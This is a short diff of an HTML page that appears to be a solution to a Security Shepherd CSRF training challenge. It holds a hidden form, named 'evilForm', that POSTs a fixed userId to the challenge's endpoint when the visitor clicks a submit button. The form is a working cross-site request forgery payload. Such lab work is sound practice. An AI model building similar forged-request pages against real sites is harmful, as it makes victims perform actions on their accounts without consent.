--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <TITLE>CSRF2</TITLE>
     <link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet'>
 </HEAD>
-<H1 style="font-family:'Orbitron';font-size:10px;width:200px">hmm..wonder what this button does.</H1>
+<H1 style="font-family:'Orbitron';font-size:10px;width:200px">hmm..wonder what this does.</H1>
 <form name="evilForm" action="https://securityshepherd.com/user/csrfchallengetwo/plusplus" method="POST">
     <input type="hidden" name="userId" value="121dd11bf97d0492aac80ef0f4b8beffc9734786" />
     <input type="submit"/>
